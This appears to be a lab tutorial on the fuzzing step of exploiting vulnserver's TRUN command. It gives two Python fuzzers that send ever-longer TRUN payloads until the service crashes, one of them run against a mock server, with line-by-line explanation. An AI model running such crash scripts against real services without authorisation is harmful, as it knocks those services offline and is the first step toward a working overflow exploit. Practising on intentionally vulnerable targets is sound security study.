FUZZing

PRACTICE ! PRACTICE ! PRACTICE !

Now that we know the TRUN command is vulnerable and crashes the program, let's fuzz it to get some juicy information: roughly how many bytes it takes to bring vulnserver down.

Run vulnserver.exe and Immunity Debugger as the Administrator user (and attach the debugger to vulnserver.exe so you can see the crash).

Let's write a Python script which will automate the fuzzing process !

#!/usr/bin/python

import sys, socket
from time import sleep

buffer = "A" * 100          # start with 100 A's and grow by 100 each round

while True:
	try:
		s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		s.connect(('192.168.0.104',9999))

		# send the buffer as the argument of TRUN (.encode() so this also runs under Python 3)
		s.send(('TRUN /.:/' + buffer).encode())
		s.close()
		sleep(1)

		buffer = buffer + "A" * 100

	except:
		# reached when connect/send fails, or when we hit CTRL + C
		print("Fuzzing crashed at %s bytes" % str(len(buffer)))
		sys.exit()

  • We import sys and socket so that we can connect to the target's IP address and port, and exit cleanly when the loop ends

  • We import sleep so that we can pause for a second before trying the whole process over again and again

  • We declare a buffer variable holding 100 A's - we loop over it and connect to the socket on every round

AF_INET means IPv4 and SOCK_STREAM means a TCP (stream) socket - the port itself is the 9999 passed to connect()

  • We send our buffer as the argument of a TRUN command - basically the 100 A's go over as TRUN /.:/AAAA...

  • Close the connection and sleep for a second !

  • Then we append another 100 A's to the buffer variable and go round the loop again, until the server crashes

  • Once we notice vulnserver.exe has crashed in the debugger, we press CTRL + C to stop the script - that lands in the except branch, which prints the current buffer length. Treat this as an estimate only: the buffer has already grown by 100 since the send that crashed the server, and while the crashed process sits paused in the debugger the OS may still complete new TCP connections for it, so connect() and send() can keep succeeding and the loop does not always stop by itself
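The same fuzzer, reworked so it does not rely on CTRL + C: instead of trusting connect() and send(), it waits (with a timeout) for vulnserver's "TRUN COMPLETE" reply and treats a missing reply, a refused connection or a timeout as the crash, then reports the last accepted length and the first failed one. This is an added example, not the script from the original page. The MockVulnserver class is a constructed stand-in for vulnserver.exe so the script runs offline; its CRASH_AT threshold is made up for the demo and is not vulnserver's real crash point.

```python
#!/usr/bin/env python3
# Added example (not the original page's script): a TRUN fuzzer that treats a
# missing "TRUN COMPLETE" reply, a refused connection or a timeout as the crash
# and brackets the crashing length between the last accepted payload and the
# first failed one. MockVulnserver is a constructed stand-in for vulnserver.exe
# so this runs offline; CRASH_AT is invented for the demo.
import socket
import threading

PREFIX = b'TRUN /.:/'      # the '.' in the argument is what reaches vulnserver's TRUN handler
CRASH_AT = 2450            # constructed threshold: the mock "dies" when the payload exceeds this


def trun_accepted(host, port, length, timeout=3.0):
    """Send one TRUN payload of `length` A's and report whether the server answered."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(PREFIX + b'A' * length)
            s.shutdown(socket.SHUT_WR)      # done sending; now wait for the reply
            reply = s.recv(1024)
    except OSError:                          # refused, reset, or timed out (socket.timeout is an OSError)
        return False
    # A live vulnserver answers "TRUN COMPLETE"; a crashed (or paused) one never does.
    return reply.startswith(b'TRUN COMPLETE')


def fuzz_trun(host, port, start=100, step=100, timeout=3.0):
    """Grow the payload by `step` until the server stops answering.

    Returns (last_ok, first_failed): the overflow that killed the server was
    triggered by a payload of length in (last_ok, first_failed], which is the
    number the next step (finding the EIP offset) starts from.
    """
    length, last_ok = start, 0
    while True:
        if not trun_accepted(host, port, length, timeout):
            return last_ok, length
        last_ok = length
        length += step


class MockVulnserver(threading.Thread):
    """Constructed stand-in for vulnserver.exe (not the real program).

    Replies "TRUN COMPLETE" until a TRUN payload longer than crash_at arrives,
    then closes its listening socket without replying, like a process that
    just died inside the TRUN handler.
    """

    def __init__(self, crash_at=CRASH_AT):
        super().__init__(daemon=True)
        self.crash_at = crash_at
        self.listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.listener.bind(('127.0.0.1', 0))     # any free port
        self.listener.listen(5)
        self.port = self.listener.getsockname()[1]

    def run(self):
        while True:
            try:
                conn, _ = self.listener.accept()
            except OSError:                      # listener closed: we "crashed"
                return
            with conn:
                data = b''
                while True:                      # read until the client shuts down its side
                    chunk = conn.recv(4096)
                    if not chunk:
                        break
                    data += chunk
                payload = data[len(PREFIX):] if data.startswith(PREFIX) else b''
                if len(payload) > self.crash_at:
                    self.listener.close()        # no more accepts: connection refused from now on
                    return                       # and no reply on this connection either
                conn.sendall(b'TRUN COMPLETE\n')


def demo(crash_at=CRASH_AT):
    """Run the fuzzer against the mock; returns (last_ok, first_failed)."""
    server = MockVulnserver(crash_at)
    server.start()
    return fuzz_trun('127.0.0.1', server.port)


if __name__ == '__main__':
    last_ok, first_failed = demo()
    print("Server accepted %d bytes; crashed somewhere at %d-%d bytes"
          % (last_ok, last_ok + 1, first_failed))
```

Against the real target you would call fuzz_trun('192.168.0.104', 9999) instead of demo(); once it returns, vulnserver is dead (or paused in the debugger) and has to be restarted before the next run. Waiting for the reply is the important difference from the page's script: while the crashed process is paused in the debugger, the OS can still complete the TCP handshake and buffer the sent bytes, so only the missing "TRUN COMPLETE" reveals that the server is gone.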

We couldn't overwrite the EIP - that's okay :)
